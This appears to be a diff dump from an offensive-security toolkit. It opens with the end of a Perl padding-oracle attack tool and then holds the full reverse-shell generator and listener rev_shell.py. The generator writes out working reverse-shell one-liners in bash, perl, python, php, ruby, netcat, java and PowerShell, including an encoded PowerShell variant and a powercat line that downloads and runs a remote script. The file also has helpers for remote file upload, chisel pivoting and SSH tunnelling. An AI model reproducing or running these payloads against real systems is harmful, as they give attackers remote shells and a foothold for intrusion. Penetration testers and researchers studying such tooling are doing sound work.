                                # First, XOR the current test byte with the padding value for this round to recover the decrypted byte
                                substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $currentPaddingByte));

                                # Then, XOR it again with the padding byte for the next round
                                substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $nextPaddingByte));
                            }
                            last INNERLOOP;
                        }

                    }
                }

                ## TODO: Combine these two blocks?
                if ($i == 0 && $analysisMode == 1) {
                    # End of the road with no success. We should probably try again.
                    &myPrint("ERROR: No matching response on [Byte ".($byteNum+1)."]",0);

                    if ($autoRetry == 0) {
                        $autoRetry = 1;
                        &myPrint("       Automatically trying one more time...",0);
                        $repeat = 1;
                        last OUTERLOOP;

                    } else {
                        if (($byteNum == $blockSize - 1) && ($error)) {
                            &myPrint("\nAre you sure you specified the correct error string?",0);
                            &myPrint("Try re-running without the -e option to perform a response analysis.\n",0);
                        }

                        $continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
                        if ($continue ne "n") {
                            &myPrint("INFO: Switching to interactive mode",0);
                            $interactive = 1;
                            $repeat = 1;
                            last OUTERLOOP;
                        }
                    }
                }
                # A hit on the very first probe for every byte position strongly
                # suggests the oracle signature / error string is wrong.
                if ($falsePositiveDetector == $blockSize) {
                    &myPrint("\n*** ERROR: It appears there are false positive results. ***\n",0);
                    &myPrint("HINT: The most likely cause for this is an incorrect error string.\n",0);
                    if ($error) {
                        &myPrint("[+] Check the error string you provided and try again, or consider running",0);
                        &myPrint("[+] without an error string to perform an automated response analysis.\n",0);
                    } else {
                        &myPrint("[+] You may want to consider defining a custom padding error string",0);
                        &myPrint("[+] instead of the automated response analysis.\n",0);
                    }
                    $continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
                    if ($continue eq "y") {
                        &myPrint("INFO: Switching to interactive mode",0);
                        $interactive = 1;
                        $repeat = 1;
                        last OUTERLOOP;
                    }
                }
            }
        }
        ($repeat == 1) ? ($complete = 0) : ($complete = 1);
    }
    return $returnValue;
}
|
||||
|
||||
sub makeRequest {
    # Issue one HTTP(S) request, retrying connection failures up to 15 times,
    # and return ($status, $content, $location, $contentLength).
    my ($method, $url, $data, $cookie) = @_;
    my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength);
    my $numRetries = 0;
    $data = '' unless $data;
    $cookie = '' unless $cookie;

    $requestTracker++;
    do {
        # Quick hack to avoid hostname in URL when using a proxy with SSL
        # (this will get re-set later if needed)
        $ENV{HTTPS_PROXY} = "";
        $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME} = 0;

        $lwp = LWP::UserAgent->new(env_proxy => 1,
                                   keep_alive => 1,
                                   timeout => 30,
                                   requests_redirectable => [],
                                   ssl_opts => { verify_hostname => 0, SSL_verify_mode => 0 },
                                  );

        $req = new HTTP::Request $method => $url;

        &myPrint("Request:\n$method\n$url\n$data\n$cookie",0) if $superVerbose;

        # Add request content for POST and PUTS
        if ($data) {
            $req->content_type('application/x-www-form-urlencoded');
            $req->content($data);
        }

        if ($proxy) {
            my $proxyUrl = "http://";
            if ($proxyAuth) {
                my ($proxyUser, $proxyPass) = split(":",$proxyAuth);
                $ENV{HTTPS_PROXY_USERNAME} = $proxyUser;
                $ENV{HTTPS_PROXY_PASSWORD} = $proxyPass;
                $proxyUrl .= $proxyAuth."@";
            }
            $proxyUrl .= $proxy;
            # BUG FIX: the credential-bearing $proxyUrl was built but never used;
            # the proxy was previously configured without the auth component.
            $lwp->proxy(['http', 'https'], $proxyUrl);
            $ENV{HTTPS_PROXY} = $proxyUrl;
        }

        # Optional HTTP basic auth ("user:pass")
        if ($auth) {
            my ($httpuser, $httppass) = split(/:/,$auth);
            $req->authorization_basic($httpuser, $httppass);
        }

        # If cookies are defined, add a COOKIE header
        if (! $cookie eq "") {
            $req->header(Cookie => $cookie);
        }

        # Custom headers arrive as "Name::Value;Name::Value"
        if ($headers) {
            my @customHeaders = split(/;/i,$headers);
            for (my $i = 0; $i <= $#customHeaders; $i++) {
                my ($headerName, $headerVal) = split(/\::/i,$customHeaders[$i]);
                $req->header($headerName, $headerVal);
            }
        }

        my $startTime = &gettimeofday();
        my $response = $lwp->request($req);
        my $endTime = &gettimeofday();
        $timeTracker = $timeTracker + ($endTime - $startTime);

        if ($printStats == 1 && $requestTracker % 250 == 0) {
            # BUG FIX: the window is 250 requests, so average over 250 (was /100)
            print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f", $timeTracker/250).")\n";
            $timeTracker = 0;
        }

        # Extract the required attributes from the response
        $status = substr($response->status_line, 0, 3);
        $content = $response->content;

        &myPrint("Response Content:\n$content",0) if $superVerbose;
        $location = $response->header("Location");
        if (!$location) {
            $location = "N/A";
        }
        $contentLength = length($content);

        # Transparently gunzip compressed bodies so later analysis sees plaintext
        my $contentEncoding = $response->header("Content-Encoding");
        if ($contentEncoding) {
            if ($contentEncoding =~ /GZIP/i ) {
                $content = Compress::Zlib::memGunzip($content);
                $contentLength = length($content);
            }
        }

        my $statusMsg = $response->status_line;

        if ($statusMsg =~ /Can't connect/) {
            print "ERROR: $statusMsg\n Retrying in 10 seconds...\n\n";
            $noConnect = 1;
            $numRetries++;
            sleep 10;
        } else {
            $noConnect = 0;
            $totalRequests++;
        }
    } until (($noConnect == 0) || ($numRetries >= 15));
    if ($numRetries >= 15) {
        &myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.\n",0);
        exit;
    }
    return ($status, $content, $location, $contentLength);
}
|
||||
|
||||
sub myPrint {
    # Print (and log) a message. Level 0 prints always; level >0 only in
    # verbose mode; superVerbose prints everything.
    my ($msg, $level) = @_;
    $msg .= "\n";
    return unless ($superVerbose || $level < 1 || ($verbose && $level > 0));
    print $msg;
    &writeFile("ActivityLog.txt", $msg);
}
|
||||
|
||||
sub myEncode {
    # Convenience wrapper: encode (oper=0) in the given format.
    my ($data, $fmt) = @_;
    return &encodeDecode($data, 0, $fmt);
}
|
||||
|
||||
sub myDecode {
    # Convenience wrapper: decode (oper=1) in the given format.
    my ($data, $fmt) = @_;
    return &encodeDecode($data, 1, $fmt);
}
|
||||
|
||||
sub encodeDecode {
    # Oper: 0=Encode, 1=Decode
    # Format: 0=Base64, 1=Hex Lower, 2=Hex Upper, 3=NetUrlToken, 4=Web64
    my ($value, $oper, $format) = @_;
    my $result = "";
    if ($format == 1 || $format == 2) {
        # Hex
        if ($oper == 1) {
            # decode: always normalize to lowercase first
            $result = pack("H*", lc($value));
        } else {
            $result = unpack("H*", $value);
            $result = uc($result) if ($format == 2);
        }
    } elsif ($format == 3) {
        # NetUrlToken (web64 with trailing padding count)
        $result = ($oper == 1) ? &web64Decode($value,1) : &web64Encode($value,1);
    } elsif ($format == 4) {
        # Web64 (URL-safe base64, padding stripped)
        $result = ($oper == 1) ? &web64Decode($value,0) : &web64Encode($value,0);
    } else {
        # Base64 (default)
        if ($oper == 1) {
            $result = &decode_base64($value);
        } else {
            $result = &encode_base64($value);
            $result =~ s/(\r|\n)//g;
        }
    }
    return $result;
}
|
||||
|
||||
|
||||
sub web64Encode {
    # URL-safe base64: '+'->'-', '/'->'_', '=' removed.
    # net: 1 = append the number of stripped pad chars (NetUrlToken), 0 = plain.
    my ($data, $net) = @_;
    $data = &encode_base64($data);
    $data =~ s/(\r|\n)//g;
    $data =~ tr/+\//-_/;
    my $padCount = $data =~ s/\=//g;
    $padCount = 0 if ($padCount eq "");
    $data .= $padCount if ($net == 1);
    return $data;
}
|
||||
|
||||
sub web64Decode {
    # Inverse of web64Encode. net: 1 = last char is the pad count (NetUrlToken).
    my ($data, $net) = @_;
    $data =~ tr/-_/+\//;
    if ($net == 1) {
        my $padCount = chop($data);
        $data .= "=" x int($padCount);
    }
    return &decode_base64($data);
}
|
||||
|
||||
|
||||
sub promptUser {
    # Prompt on stdin. yn mode accepts y/n/a; otherwise accepts a number
    # in (0,256). Re-prompts until the input is valid.
    my($prompt, $default, $yn) = @_;
    my $defaultValue = $default ? "[$default]" : "";
    print "$prompt $defaultValue: ";
    chomp(my $input = <STDIN>);

    $input = $input ? $input : $default;
    if ($yn) {
        if ($input =~ /^y|n|a$/) {
            return $input;
        } else {
            # BUG FIX: the recursive re-prompt's result was discarded, so
            # any invalid answer made the sub return undef to the caller.
            return &promptUser($prompt, $default, $yn);
        }
    } else {
        if ($input =~ /^-?\d/ && $input > 0 && $input < 256) {
            return $input;
        } else {
            # BUG FIX: propagate the re-prompted value (was missing `return`)
            return &promptUser($prompt, $default);
        }
    }
}
|
||||
|
||||
sub writeFile {
    # Append content to a file inside the log directory (no-op unless logging
    # is enabled). Creates the directory on first use.
    my ($name, $content) = @_;
    return unless $logFiles;
    if ($dirExists != 1) {
        system($dirCmd." ".$dirName);
        $dirExists = 1;
    }
    my $path = $dirName.$dirSlash.$name;
    open(my $fh, '>>', $path) or die "ERROR: Can't write to file $path\n";
    print $fh $content;
    close($fh);
}
|
||||
|
||||
sub getTime {
    # Timestamp helper. "F" -> file-name friendly (ddMONyy-secondsOfDay),
    # "S" -> human readable, anything else -> HH:MM:SS.
    my ($format) = @_;
    my ($sec, $min, $hr, $mday, $mon, $yr) = localtime(time);
    my @monthNames = ("JAN","FEB","MAR","APR","MAY","JUN","JUL","AUG","SEP","OCT","NOV","DEC");
    foreach ($mon, $mday, $hr, $min, $sec) {
        $_ = sprintf("%02d", $_);
    }
    # localtime's year is years-since-1900; dropping the leading digit
    # leaves the two-digit year (valid until 2100)
    $yr =~ s/^.//;
    if ($format eq "F") {
        return $mday.$monthNames[$mon].$yr."-".( ($hr * 3600) + ($min * 60) + ($sec) );
    } elsif ($format eq "S") {
        return $monthNames[$mon]." ".$mday.", 20".$yr." at ".$hr.":".$min.":".$sec;
    } else {
        return $hr.":".$min.":".$sec;
    }
}
|
||||
580
tools/exploits/rev_shell.py
Executable file
580
tools/exploits/rev_shell.py
Executable file
@@ -0,0 +1,580 @@
|
||||
#!/usr/bin/python
|
||||
|
||||
import socket
|
||||
import os
|
||||
import re
|
||||
import sys
|
||||
import pty
|
||||
import time
|
||||
import random
|
||||
import threading
|
||||
import paramiko
|
||||
import base64
|
||||
import select
|
||||
import argparse
|
||||
import signal
|
||||
|
||||
from hackingscripts.utils import util
|
||||
from hackingscripts.tools.misc import upload_file
|
||||
|
||||
try:
|
||||
import SocketServer
|
||||
except ImportError:
|
||||
import socketserver as SocketServer
|
||||
|
||||
class ShellListener:
|
||||
|
||||
def __init__(self, addr, port):
    """Reverse-shell TCP listener bound to addr:port (use start/startBackground)."""
    self.listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.bind_addr = addr
    self.port = port
    self.verbose = False
    self.on_message = []        # callbacks fed each chunk of received bytes
    self.on_connect = None      # optional callback(addr) fired on connect
    self.listen_thread = None
    self.connection = None      # active client socket, if any
    self.features = set()       # lower-cased binary names found by probe_features()
    self.shell_ready = False    # True once the first shell prompt was seen
    self.os = None              # we need a way to find the OS here
    self.raw_output = b""       # output received before the first prompt
|
||||
|
||||
def startBackground(self):
    """Run start() in a worker thread; returns the Thread object."""
    worker = threading.Thread(target=self.start)
    worker.start()
    self.listen_thread = worker
    return worker
|
||||
|
||||
def has_feature(self, feature):
    """True if probe_features() found the given binary (case-insensitive)."""
    needle = feature.lower()
    return needle in self.features
|
||||
|
||||
def probe_features(self):
    """Populate self.features by running `whereis` for a fixed binary list (unix only)."""
    if self.os != "unix":
        print("[-] Can't probe features for os:", self.os)
        return
    for name in ("wget", "curl", "nc", "sudo", "telnet", "docker", "python"):
        out = self.exec_sync("whereis " + name)
        # whereis prints "name: /path ..." only when the binary exists
        if out.startswith(name.encode() + b": ") and len(out) >= len(name) + 2:
            self.features.add(name.lower())
|
||||
|
||||
def get_features(self):
    """Return the set of feature names collected by probe_features()."""
    return self.features
|
||||
|
||||
def start(self):
    """Accept one client and pump its output to the registered callbacks.

    Probes the remote OS from the first banner bytes and buffers output
    in raw_output until the first shell prompt is seen (shell_ready).
    Blocks until the client disconnects.
    """
    self.running = True
    self.listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    self.listen_socket.bind((self.bind_addr, self.port))
    self.listen_socket.listen()
    while self.running:
        conn, addr = self.listen_socket.accept()
        self.connection = conn
        with conn:
            print("[+] Got connection:", addr)

            if self.on_connect:
                self.on_connect(addr)

            self.shell_ready = False
            while self.running:
                data = conn.recv(1024)
                if not data:
                    break

                if self.os is None and not self.shell_ready:
                    # crude banner-based OS detection -- TODO confirm heuristics
                    if b"Windows PowerShell" in data or b"Microsoft Windows" in data:
                        self.os = "win"
                    elif b"bash" in data or b"sh" in data:
                        self.os = "unix"

                    if self.os and self.verbose:
                        print("OS PROBED:", self.os)

                if self.verbose:
                    print("< ", data)

                if self.shell_ready:  # TODO: check this...
                    for cb in self.on_message:
                        cb(data)
                elif self.is_prompt(data):
                    self.shell_ready = True
                    if self.verbose:
                        print("RECV first prompt")
                else:
                    self.raw_output += data
                    for cb in self.on_message:
                        cb(data)

        print("[-] Disconnected")
        self.connection = None
        self.running = False
|
||||
|
||||
def close(self):
    """Stop the listener: signal exit, close the socket, join the worker thread."""
    self.running = False
    self.sendline("exit")
    self.listen_socket.close()
    # BUG FIX: threading.currentThread() was removed in Python 3.13; also
    # guard against start() having been called directly (listen_thread None).
    if self.listen_thread is not None and self.listen_thread is not threading.current_thread():
        self.listen_thread.join()
|
||||
|
||||
def send(self, data):
    """Send raw bytes (str is encoded first) to the connected shell, if any."""
    if not self.connection:
        return
    payload = data.encode() if isinstance(data, str) else data
    if self.verbose:
        print("> ", payload)
    self.connection.sendall(payload)
|
||||
|
||||
def sendline(self, data):
    """Send data followed by a newline."""
    if isinstance(data, str):
        data = data.encode()
    return self.send(data + b"\n")
|
||||
|
||||
def is_prompt(self, data):
    """Heuristic: does this output chunk end in a shell prompt for the probed OS?"""
    if self.os == "unix":
        return data.endswith((b"# ", b"$ "))
    if self.os == "win":
        return data.endswith((b"> ", b">", b"$ "))
    return False
|
||||
|
||||
def exec_sync(self, cmd):
    """Run cmd on the remote shell and block until its output is collected.

    Waits for OS probing and the first prompt, then gathers output until
    another prompt appears; strips the trailing prompt line and the echoed
    command before returning the bytes.
    """
    if self.os is None:
        print("[-] OS not probed yet, waiting...")
        while self.os is None:
            time.sleep(0.1)
    if not self.shell_ready:
        print("[-] Shell not ready yet, waiting...")
        while not self.shell_ready:
            time.sleep(0.1)

    if isinstance(cmd, str):
        cmd = cmd.encode()

    collected = b""
    done = False

    def collector(data):
        nonlocal collected
        nonlocal done
        if done:
            return
        collected += data
        if self.is_prompt(collected):
            done = True
            eol = b"\n" if self.os == "unix" else b"\r\n"
            # drop the trailing prompt line, then the echoed command itself
            if eol in collected:
                collected = collected[0:collected.rindex(eol)]
            if collected.startswith(cmd + eol):
                collected = collected[len(cmd) + len(eol):]

    self.on_message.append(collector)
    self.sendline(cmd)
    while not done:
        time.sleep(0.1)

    self.on_message.remove(collector)
    return collected
|
||||
|
||||
def print_message(self, data):
    """Decode and echo received bytes without letting decode errors kill the pump."""
    try:
        text = data.decode()
    except:
        text = str(data)  # workaround so the shell doesn't die
    sys.stdout.write(text)
    sys.stdout.flush()
|
||||
|
||||
def interactive(self):
    """Mirror remote output to stdout and forward local stdin lines until disconnect."""
    print("[ ] Switching to interactive mode")
    self.on_message.append(self.print_message)
    while self.running and self.connection is not None:
        self.sendline(input())
|
||||
|
||||
def wait(self):
    """Block until a client connects (or the listener stops); returns self.running."""
    while self.connection is None and self.running:
        time.sleep(0.1)
    return self.running
|
||||
|
||||
def get_cwd(self):
    """Return the remote working directory as text, or None for an unknown OS."""
    if self.os == "unix":
        return self.exec_sync("pwd").decode()
    if self.os == "win":
        return self.exec_sync("pwd | foreach {$_.Path}").decode()
    print("[-] get_cwd not implemented for os:", self.os)
    return None
|
||||
|
||||
def write_file(self, path, data_or_fd, permissions=None, method=None, sync=False, **kwargs):
    """Write data (str/bytes or a readable file object) to `path` on the remote host.

    method: "echo" (base64 chunks via `echo|base64 -d`), "powershell"
    (FileStream + FromBase64String) or "nc"/"netcat" (target pulls the file
    from a locally served socket). Defaults are chosen from the probed OS.
    permissions: chmod mode applied afterwards (unix only).
    sync: run each remote command via exec_sync instead of fire-and-forget.
    """
    if method is None:
        if self.os == "win":
            method = "powershell"
        elif self.os == "unix":
            method = "echo"
        else:
            print("[-] No method specified, assuming 'echo'")
            method = "echo"  # BUG FIX: was the bare name `echo` -> NameError

    print(f"[ ] Writing file '{path}' using method: {method}")
    send_func = self.sendline if not sync else self.exec_sync

    def write_chunk(chunk, first=False):
        # each chunk travels base64-encoded so binary data survives the shell
        chunk = base64.b64encode(chunk).decode()
        if method == "powershell":
            send_func(f"$decodedBytes = [System.Convert]::FromBase64String('{chunk}')")
            send_func(f"$stream.Write($decodedBytes, 0, $decodedBytes.Length)")
        else:
            operator = ">" if first else ">>"
            send_func(f"echo {chunk}|base64 -d {operator} {path}")

    if method == "echo" or method == "powershell":
        if method == "powershell":
            # NOTE(review): PowerShell escapes a single quote by doubling it,
            # not with a backslash -- confirm this escaping is intended
            path = path.replace("'", "\\'")
            send_func(f"$stream = [System.IO.File]::Open('{path}', [System.IO.FileMode]::Create)")

        chunk_size = 1024
        if hasattr(data_or_fd, "read"):
            first = True
            while True:
                data = data_or_fd.read(chunk_size)
                if not data:
                    break
                if isinstance(data, str):
                    data = data.encode()
                write_chunk(data, first)
                first = False
            data_or_fd.close()
        else:
            if isinstance(data_or_fd, str):
                data_or_fd = data_or_fd.encode()
            for offset in range(0, len(data_or_fd), chunk_size):
                write_chunk(data_or_fd[offset:offset + chunk_size], offset == 0)

        if method == "powershell":
            send_func(f"$stream.Close()")

    elif method == "nc" or method == "netcat":
        # serve the file from a local socket and make the target pull it
        ip_addr = util.get_address()
        bin_path = "nc" if not "bin_path" in kwargs else kwargs["bin_path"]
        port = None if "listen_port" not in kwargs else int(kwargs["listen_port"])
        sock = util.open_server(ip_addr, port, retry=False)
        if not sock:
            return False

        def serve_file():
            upload_file.serve_file(sock, data_or_fd, forever=False)

        port = sock.getsockname()[1]
        upload_thread = threading.Thread(target=serve_file)
        upload_thread.start()
        send_func(f"{bin_path} {ip_addr} {port} > {path}")
        upload_thread.join()
    else:
        print("[-] Unknown write-file method:", method)
        return False

    if permissions and self.os == "unix":
        send_func(f"chmod {permissions} {path}")

    print("[+] Done!")
|
||||
|
||||
class ParamikoTunnelServer(SocketServer.ThreadingTCPServer):
    """Threaded TCP server used as the local end of a paramiko port forward."""

    daemon_threads = True
    allow_reuse_address = True
|
||||
|
||||
class ParamikoTunnel:
    """Forward a set of local ports through an established paramiko SSH client."""

    def __init__(self, shell, ports):
        self.shell = shell              # paramiko.SSHClient -- TODO confirm
        self.ports = ports
        self.verbose = False
        self.is_running = True
        self.on_message = []
        self.listen_threads = []
        self.servers = []

    def start_background(self):
        """Spawn one forwarding-server thread per port; returns the threads."""
        for p in self.ports:
            worker = threading.Thread(target=self.start, args=(p, ))
            worker.start()
            self.listen_threads.append(worker)
        return self.listen_threads

    def start(self, port):
        """Serve 127.0.0.1:port, tunnelling each connection over SSH (blocks)."""
        this = self

        class SubHandler(ParamikoTunnelHandler):
            peer = this.shell.get_transport().sock.getpeername()
            chain_host = "127.0.0.1"
            chain_port = port
            ssh_transport = this.shell.get_transport()

            def log(self, message):
                if this.verbose:
                    print(message)

        server = ParamikoTunnelServer(("127.0.0.1", port), SubHandler)
        self.servers.append(server)
        server.serve_forever()

    def close(self):
        """Stop every forwarding server and join the worker threads."""
        self.is_running = False
        for server in self.servers:
            # reach into BaseServer internals to break serve_forever()
            server._BaseServer__shutdown_request = True
        for worker in self.listen_threads:
            worker.join()
|
||||
|
||||
class ParamikoTunnelHandler(SocketServer.BaseRequestHandler):
    """Pipe one accepted TCP connection through a direct-tcpip SSH channel.

    Subclasses supply chain_host/chain_port/ssh_transport and log()
    (see ParamikoTunnel.start).
    """

    def handle(self):
        try:
            chan = self.ssh_transport.open_channel(
                "direct-tcpip",
                (self.chain_host, self.chain_port),
                self.request.getpeername(),
            )
        except Exception as e:
            self.log(
                "Incoming request to %s:%d failed: %s"
                % (self.chain_host, self.chain_port, repr(e))
            )
            return
        if chan is None:
            self.log(
                "Incoming request to %s:%d was rejected by the SSH server."
                % (self.chain_host, self.chain_port)
            )
            return

        self.log(
            "Connected! Tunnel open %r -> %r -> %r"
            % (
                self.request.getpeername(),
                chan.getpeername(),
                (self.chain_host, self.chain_port),
            )
        )
        # shuttle bytes both ways until either side closes
        while True:
            readable, _, _ = select.select([self.request, chan], [], [])
            if self.request in readable:
                buf = self.request.recv(1024)
                if len(buf) == 0:
                    break
                chan.send(buf)
            if chan in readable:
                buf = chan.recv(1024)
                if len(buf) == 0:
                    break
                self.request.send(buf)

        peername = self.request.getpeername()
        chan.close()
        self.request.close()
        self.log("Tunnel closed from %r" % (peername,))
|
||||
|
||||
def generate_payload(payload_type, local_address, port, index=None, **kwargs):
    """Build a reverse-shell one-liner of the requested type.

    Returns the command string, or None for an unknown payload type.
    kwargs tune per-type details (shell, protocol, method, ...).
    """
    shell = kwargs.get("shell", "/bin/bash")

    if payload_type in ["sh", "bash"]:
        protocol = kwargs.get("protocol", "tcp")
        assert protocol in ["tcp", "udp"]
        return f"{payload_type} -i >& /dev/{protocol}/{local_address}/{port} 0>&1"

    if payload_type == "perl":
        if kwargs.get("method", "exec") == "exec":
            return f"perl -e 'use Socket;$i=\"{local_address}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/{shell} -i\");}};'"
        return f"perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"{local_address}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"

    if re.match(r"python((2|3)(\.[0-9]+)?)?", payload_type):
        return f"{payload_type} -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{local_address}\",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/{shell}\",\"-i\"]);'"

    if payload_type == "php":
        return f"php -r '$sock=fsockopen(\"{local_address}\",{port});exec(\"/{shell} -i <&3 >&3 2>&3\");'"

    if payload_type == "ruby":
        return f"ruby -rsocket -e'f=TCPSocket.open(\"{local_address}\",{port}).to_i;exec sprintf(\"{shell} -i <&%d >&%d 2>&%d\",f,f,f)'"

    if payload_type in ["netcat", "nc", "ncat"]:
        if kwargs.get("method", "fifo") == "fifo":
            fifo_name = kwargs.get("fifo_name", "f")
            return f"rm /tmp/{fifo_name};mkfifo /tmp/{fifo_name};cat /tmp/{fifo_name}|{shell} -i 2>&1|{payload_type} {local_address} {port} >/tmp/{fifo_name}"
        return f"{payload_type} {local_address} {port} -e {shell}"

    if payload_type == "java":
        return f"r = Runtime.getRuntime()\np = r.exec([\"{shell}\",\"-c\",\"exec 5<>/dev/tcp/{local_address}/{port};cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()"

    if payload_type == "xterm":
        return f"xterm -display {local_address}:1"

    if payload_type == "powercat":
        shell = kwargs.get("shell", "cmd")
        http_port = kwargs.get("http_port", 80)
        return f"powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://{local_address}:{http_port}/powercat.ps1');powercat -c {local_address} -p {port} -e {shell}\""

    if payload_type == "powershell":
        payload = '$a=New-Object System.Net.Sockets.TCPClient("%s",%d);$d=$a.GetStream();[byte[]]$k=0..65535|%%{0};while(($i=$d.Read($k,0,$k.Length)) -ne 0){;$o=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($k,0,$i);$q=(iex $o 2>&1|Out-String);$c=$q+"$ ";$b=([text.encoding]::ASCII).GetBytes($c);$d.Write($b,0,$b.Length);$d.Flush()};$a.Close();' % (local_address, port)
        if kwargs.get("method", "process") == "process":
            payload_encoded = base64.b64encode(payload.encode("UTF-16LE")).decode()
            execution_policy = kwargs.get("execution_policy", "bypass")
            flags = ["-EncodedCommand", payload_encoded]
            if execution_policy is not None:
                flags.append("-ExecutionPolicy")
                flags.append(execution_policy)
            payload = f"powershell.exe {' '.join(flags)}"
        return payload

    print("[-] Unknown payload type:", payload_type)
    return None
|
||||
|
||||
def spawn_listener(port):
    """Foreground netcat listener in a pty that respawns when the shell dies."""
    signal.signal(signal.SIGINT, on_ctrl_c)
    while True:
        saved_stdin = os.dup(0)
        pid, fd = pty.fork()
        if pid == 0:
            # child: restore the real stdin, then exec netcat in the pty
            os.dup2(saved_stdin, 0)
            os.execvp("nc", ["nc", "-lvvp", str(port)])
        else:
            try:
                while True:
                    chunk = os.read(fd, 1024)
                    if not chunk:
                        break
                    sys.stdout.buffer.write(chunk)
                    sys.stdout.flush()
            except OSError as e:
                print("[!] OSError:", str(e), "respawning shell…")
|
||||
|
||||
def wait_for_connection(listener, timeout=None, prompt=True):
    """Poll until the listener has a client; returns the listener, or None on timeout.

    prompt may be a custom string, True for the default message, or falsy to
    stay silent. With a timeout, a countdown line is redrawn in place.
    """
    start = time.time()
    if prompt:
        prompt = prompt if type(prompt) == str else "[ ] Waiting for shell"
        if timeout is not None:
            timer_len = sys.stdout.write("\r%s: %ds\r" % (prompt, timeout))
            sys.stdout.flush()
        else:
            print(prompt)

    while listener.connection is None and listener.running:
        time.sleep(0.5)
        if timeout is not None:
            # NOTE(review): timer_len is only set when prompt was truthy --
            # a falsy prompt plus a timeout would NameError here; confirm intent
            elapsed = time.time() - start
            if elapsed < timeout:
                sys.stdout.write(util.pad("\r%s: %ds" % (prompt, timeout - elapsed), timer_len, " ") + "\r")
                sys.stdout.flush()
            else:
                print(util.pad("\r[-] Shell timeout :(", timer_len, " ") + "\r")
                return None

    return listener
|
||||
|
||||
def spawn_background_shell(port, timeout=None, prompt=True):
    """Start a background ShellListener on 0.0.0.0:port and wait for a client."""
    shell = ShellListener("0.0.0.0", port)
    shell.startBackground()
    wait_for_connection(shell, timeout, prompt)
    return shell
|
||||
|
||||
def trigger_shell(func, port):
    """Fire `func` (the exploit trigger) after a short delay, then listen on `port`."""
    def _delayed_trigger():
        time.sleep(1.5)
        func()

    threading.Thread(target=_delayed_trigger).start()
    spawn_listener(port)
|
||||
|
||||
def trigger_background_shell(func, port, timeout=None, prompt=True):
    """Run `func` in a thread while a background listener waits on `port`."""
    shell = ShellListener("0.0.0.0", port)
    shell.startBackground()
    threading.Thread(target=func).start()
    wait_for_connection(shell, timeout, prompt)
    return shell
|
||||
|
||||
def create_tunnel(shell, ports: list):
    """Expose remote ports locally: via chisel for a ShellListener, or an SSH
    port-forward for a paramiko.SSHClient. Returns the worker thread / tunnel."""
    if len(ports) == 0:
        print("[-] Need at least one port to tunnel")
        return

    if isinstance(shell, ShellListener):
        # TODO: if chisel has not been transmitted yet
        # we need a exec sync function, but this requires guessing when the
        # output ended or we need to know the shell prompt
        ip_address = util.get_address()
        # BUG FIX: this was assigned as `chiselPort` but referenced below as
        # `chisel_port`, raising NameError at runtime
        chisel_port = 3000
        chisel_path = os.path.join(os.path.dirname(__file__), "chisel64")
        shell.write_file("/tmp/chisel64", open(chisel_path, "rb"))
        shell.sendline("chmod +x /tmp/chisel64")

        server_thread = threading.Thread(
            target=os.system,
            args=(f"{chisel_path} server --port {chisel_port} --reverse", ))
        server_thread.start()

        # BUG FIX: f-string of a list rendered as "['80', ...]"; chisel expects
        # space-separated remote specs
        port_args = " ".join(str(p) for p in ports)
        shell.sendline(f"/tmp/chisel64 client --max-retry-count 1 {ip_address}:{chisel_port} {port_args} 2>&1 >/dev/null &")
        return server_thread
    elif isinstance(shell, paramiko.SSHClient):
        paramiko_tunnel = ParamikoTunnel(shell, ports)
        paramiko_tunnel.start_background()
        return paramiko_tunnel
|
||||
|
||||
def on_ctrl_c(*args):
    """SIGINT handler: exit only on a second ctrl-c within 1.5 seconds."""
    global ctrl_c_pressed
    now = time.time()
    previous = globals().get("ctrl_c_pressed", None)
    if previous and (now - previous) <= 1.5:
        sys.exit(0)
    print("[!] CTRL-C pressed. Press again if you really want to interrupt")
    ctrl_c_pressed = now
|
||||
|
||||
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Reverse shell generator")
    parser.add_argument(dest="type", type=str, default=None, help="Payload type")
    parser.add_argument("-p", "--port", type=int, required=False, default=None, help="Listening port")
    parser.add_argument("-a", "--addr", type=str, required=False, default=util.get_address(), help="Listening address")
    args, extra = parser.parse_known_args()

    listen_port = args.port
    payload_type = args.type.lower()
    local_address = args.addr

    # leftover "key=value" arguments become generate_payload kwargs
    extra_args = {}
    for entry in extra:
        match = re.match(r"(\w+)=(\w+)", entry)
        if not match:
            print("Invalid extra argument:", entry)
            exit()
        key, value = match.groups()
        extra_args[key] = value

    # choose random port
    if listen_port is None:
        listen_port = random.randint(10000,65535)
        while util.is_port_in_use(listen_port):
            listen_port = random.randint(10000,65535)

    payload = generate_payload(payload_type, local_address, listen_port, **extra_args)
    if payload is None:
        print("Unknown payload type: %s" % payload_type)
        print("Supported types: sh, bash, perl, python[2|3], php, ruby, netcat|nc, java, xterm, powershell")
        exit(1)

    # e.g. python3.11 -- reuse the requested interpreter for the tty upgrade
    tty_bin = payload_type if payload_type.startswith("python") else "python"
    tty = f"{tty_bin} -c 'import pty; pty.spawn(\"/bin/bash\")'"
    print("---PAYLOAD---\n%s\n---TTY---\n%s\n---------\n" % (payload, tty))

    if payload_type == "xterm":
        print("You need to run the following commands (not tested):")
        print("xhost +targetip")
        print("Xnest :1")
    else:
        spawn_listener(listen_port)
|
||||
85
tools/exploits/ssh-check-username.py
